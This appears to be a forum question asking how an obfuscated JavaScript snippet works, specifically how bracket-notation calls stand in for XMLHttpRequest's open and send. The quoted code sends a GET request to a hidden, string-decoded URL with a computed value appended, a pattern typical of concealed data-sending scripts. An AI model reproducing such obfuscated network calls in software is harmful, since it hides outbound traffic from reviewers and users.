I try to understand some syntax in javascript and i would like your help with that.
var _0xee6b68 = new XMLHttpRequest();
_0xee6b68[_0x4e1f('0x1b')]('GET', _0x4e1f('0x1c') + _0x54a092[_0x4e1f('0xf')](), !![]);
_0xee6b68[_0x4e1f('0x1d')]();
I don't understand what is the meaning in the second line:
we see an array that executes a function called ox4e1f
with argument 0x1b
and then immediatly we have some get function. But i don't understand how you call that get function because usually if you configure some var to a new xmlhttp-request you need to use a function, for example:
0xee6b68.open('GET',...,)
But here i dont see it...
So i would like any help to understand the syntax here.